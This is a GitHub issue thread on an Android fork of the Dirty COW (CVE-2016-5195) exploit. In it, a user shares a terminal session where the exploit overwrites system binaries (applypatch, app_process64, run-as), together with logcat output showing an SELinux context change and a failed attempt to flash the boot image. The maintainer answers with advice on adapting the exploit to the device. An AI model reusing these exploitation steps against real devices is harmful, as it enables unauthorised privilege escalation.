jcadduono / android_external_dirtycow

CVE-2016-5195 (dirtycow/dirtyc0w) - recowvery fork
https://build.nethunter.com/android-tools/dirtycow/

Error 1: Operation not permitted #8

Open ghost opened 7 years ago

ghost commented 7 years ago

Device: Samsung Galaxy S6 Edge Verizon (sm-g925v) Android 6.0.1

```
shell@zeroltevzw:/data/local/tmp $ ls
dirtycow
recowvery-app_process64
recowvery-applypatch
recowvery-run-as
shell@zeroltevzw:/data/local/tmp $ chmod +x *
shell@zeroltevzw:/data/local/tmp $ clear

/dirtycow /system/bin/applypatch recowvery-applypatch <
warning: new file size (18472) and file old size (82912) differ

size 82912

[*] mmap 0x7f906a0000
[*] exploit (patch)
[*] currently 0x7f906a0000=10102464c457f
[*] madvise = 0x7f906a0000 82912
[*] madvise = 0 1048576
^C
/dirtycow /system/bin/applypatch recowvery-applypatch <
warning: new file size (18472) and file old size (82912) differ

size 82912

[*] mmap 0x7f7a98e000
[*] exploit (patch)
[*] currently 0x7f7a98e000=10102464c457f
[*] madvise = 0x7f7a98e000 82912
[*] madvise = 0 1048576
[*] /proc/self/mem 1040187392 1048576
[*] exploited 0x7f7a98e000=10102464c457f
/dirtycow /system/bin/app_process64 recowvery-app_process64 <
warning: new file size (10200) and file old size (22456) differ

size 22456

[*] mmap 0x7f8af9b000
[*] exploit (patch)
[*] currently 0x7f8af9b000=10102464c457f
[*] madvise = 0x7f8af9b000 22456
[*] madvise = 0 1048576
[*] /proc/self/mem 2071986176 1048576
[*] exploited 0x7f8af9b000=10102464c457f
/dirtycow /system/bin/run-as recowvery-run-as <
warning: new file size (10192) and file old size (14192) differ

size 14192

[*] mmap 0x7f9ce3c000
[*] exploit (patch)
[*] currently 0x7f9ce3c000=10102464c457f
[*] madvise = 0x7f9ce3c000 14192
[*] madvise = 0 1048576
[*] /proc/self/mem 1996488704 1048576
[*] exploited 0x7f9ce3c000=10102464c457f
shell@zeroltevzw:/data/local/tmp $ run-as su
Welcome to recowvery! (run-as)

Current uid: 2000
Setting capabilities
Could not set capabilities
Error 1: Operation not permitted
logcat:
--------- beginning of main
--------- beginning of system
01-22 17:20:12.041 18374 18374 I recowvery: Welcome to recowvery! (app_process64)
01-22 17:20:12.041 18374 18374 I recowvery: ------------
01-22 17:20:12.041 18374 18374 I recowvery: Current selinux context: u:r:zygote:s0
01-22 17:20:12.041 18374 18374 I recowvery: Set context to 'u:r:system_server:s0'
01-22 17:20:12.051 18374 18374 I recowvery: Current security context: u:r:system_server:s0
01-22 17:20:12.051 18374 18374 I recowvery: Setting property 'ctl.start' to 'flash_recovery'
01-22 17:20:12.051 18374 18374 I recowvery: ------------
01-22 17:20:12.051 18374 18374 I recowvery: Recovery flash script should have started!
01-22 17:20:12.051 18374 18374 I recowvery: Run on your PC or device to see progress: adb logcat -s recowvery
01-22 17:20:12.051 18374 18374 I recowvery: Waiting 3 minutes to try again (in case it didn't start or you forgot to dirtycow applypatch first)...
01-22 17:20:12.101 18380 18380 I recowvery: Welcome to recowvery! (applypatch)
01-22 17:20:12.101 18380 18380 I recowvery: ------------
01-22 17:20:12.101 18380 18380 I recowvery: Loading boot image from block device '/dev/block/bootdevice/by-name/boot'...
01-22 17:20:12.101 18380 18380 E recowvery: Failed to load boot image!
01-22 17:20:12.101 18380 18380 E recowvery: Error 22: Invalid argument
01-22 17:20:12.101 18380 18380 E recowvery: Exiting...
01-22 17:20:12.111 18383 18383 I recowvery: Welcome to recowvery! (applypatch)
01-22 17:20:12.111 18383 18383 I recowvery: ------------
01-22 17:20:12.111 18383 18383 I recowvery: Loading boot image from block device '/dev/block/bootdevice/by-name/boot'...
01-22 17:20:12.111 18383 18383 E recowvery: Failed to load boot image!
01-22 17:20:12.111 18383 18383 E recowvery: Error 22: Invalid argument
01-22 17:20:12.111 18383 18383 E recowvery: Exiting...
01-22 17:23:12.091 18870 18870 I recowvery: Welcome to recowvery! (app_process64)
01-22 17:23:12.091 18870 18870 I recowvery: ------------
01-22 17:23:12.091 18870 18870 I recowvery: Current selinux context: u:r:zygote:s0
01-22 17:23:12.091 18870 18870 I recowvery: Set context to 'u:r:system_server:s0'
01-22 17:23:12.091 18870 18870 I recowvery: Current security context: u:r:system_server:s0
01-22 17:23:12.091 18870 18870 I recowvery: Setting property 'ctl.start' to 'flash_recovery'
01-22 17:23:12.101 18870 18870 I recowvery: ------------
01-22 17:23:12.101 18870 18870 I recowvery: Recovery flash script should have started!
01-22 17:23:12.101 18870 18870 I recowvery: Run on your PC or device to see progress: adb logcat -s recowvery
01-22 17:23:12.101 18870 18870 I recowvery: Waiting 3 minutes to try again (in case it didn't start or you forgot to dirtycow applypatch first)...
01-22 17:23:12.131 18876 18876 I recowvery: Welcome to recowvery! (applypatch)
01-22 17:23:12.131 18876 18876 I recowvery: ------------
01-22 17:23:12.131 18876 18876 I recowvery: Loading boot image from block device '/dev/block/bootdevice/by-name/boot'...
01-22 17:23:12.131 18876 18876 E recowvery: Failed to load boot image!
01-22 17:23:12.131 18876 18876 E recowvery: Error 22: Invalid argument
01-22 17:23:12.131 18876 18876 E recowvery: Exiting...
01-22 17:23:12.141 18877 18877 I recowvery: Welcome to recowvery! (applypatch)
01-22 17:23:12.141 18877 18877 I recowvery: ------------
01-22 17:23:12.141 18877 18877 I recowvery: Loading boot image from block device '/dev/block/bootdevice/by-name/boot'...
01-22 17:23:12.141 18877 18877 E recowvery: Failed to load boot image!
01-22 17:23:12.141 18877 18877 E recowvery: Error 22: Invalid argument
01-22 17:23:12.141 18877 18877 E recowvery: Exiting...
```

jcadduono commented 7 years ago

You need to edit the recowvery-applypatch.c file with the actual path to the boot image, since Samsung doesn't set up the symlink for bootdevice properly. Not sure what the actual path is; you can check fstab or the install-recovery.sh script if it's readable. You also need to edit the rc injection in there as well (Samsung doesn't have an init.fm.whatever). In any case, there's no use in doing so, as this device does not have an unlocked bootloader.

ghost commented 7 years ago

I want to have only one root shell, no flash recovery.

jcadduono commented 7 years ago

Well, the root shell requires permissive SELinux, which requires flashing a permissive boot to recovery, so you're SOL.